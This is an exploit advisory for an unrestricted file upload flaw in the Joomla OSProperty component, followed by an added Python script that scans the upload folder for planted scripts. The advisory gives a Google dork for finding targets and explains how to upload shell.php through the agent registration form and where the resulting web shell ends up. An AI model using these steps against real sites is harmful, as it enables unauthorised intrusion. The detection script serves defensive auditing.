Joomla com property unrestricted file upload image php

2016.05.13
Credit: Hacker Khan
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

##########################
# Exploit Title: joomla com property unrestricted file upload image php
# Dork Google : inurl:/com_osproperty
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Discovered By: Hacker Khan
# Vendor: http://extensions.joomla.org
# Version: 2.0.2
# Tested on : Linux(arch)-Windows(7ultimate)
###########################
#1. Go to this route:
http://site.com/component/osproperty/?task=agent_register
#############################
#2. Complete the form, uploading shell.php instead of your photo.
#############################
#3. Locate your file in the root, under /osproperty/agent/:
http://site.com/images/osproperty/agent/randomid_yourshell.php
#############################
#Help: This path can help you find your web shell in case you need it:
component/osproperty/?task=agent_default
############################
#Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran || Ormazd || Sh@d0w || MaMaD_Malware || OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier || And All Of Iranian Anonymous .
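
An added example, not part of the original advisory: a Python audit of the upload folder named in step 3 (images/osproperty/agent/) that flags any file that is not a plain image. The allowed image types, the script-extension list and the ignored index.html are assumptions, and the sample files in the demo are constructed.

```python
import os
import tempfile

# Assumption: agent photos are only ever JPEG, PNG or GIF.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
}
# Extensions often mapped to the PHP handler; the real set depends on server config.
SCRIPT_EXTS = {"php", "phtml", "php3", "php4", "php5", "php7", "phar", "pht"}
IGNORED = {"index.html"}  # assumption: blank placeholder files kept in upload folders


def classify(path):
    """Return why a file is suspicious, or None if it looks like a plain image."""
    name = os.path.basename(path).lower()
    if name in IGNORED:
        return None
    # A script extension anywhere in the name, so photo.php.jpg is caught too.
    if any(part in SCRIPT_EXTS for part in name.split(".")[1:]):
        return "script extension"
    ext = os.path.splitext(name)[1]
    if ext not in IMAGE_MAGIC:
        return "unexpected extension"
    with open(path, "rb") as fh:
        data = fh.read()
    if not data.startswith(IMAGE_MAGIC[ext]):
        return "content does not match extension"
    if b"<?php" in data:
        return "PHP tag inside image"
    return None


def audit_upload_dir(root):
    """Walk root and return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            reason = classify(full)
            if reason:
                findings.append((os.path.relpath(full, root), reason))
    return sorted(findings)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:  # constructed sample files
        for fname, body in [("1_a.php", b"<?php ?>"), ("2_b.png", b"\x89PNG\r\n\x1a\n..")]:
            with open(os.path.join(d, fname), "wb") as fh:
                fh.write(body)
        print(audit_upload_dir(d))
```

Point `audit_upload_dir` at the site's images/osproperty/agent/ directory; any finding there warrants review of the file and of the web server's handler mapping for that folder.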

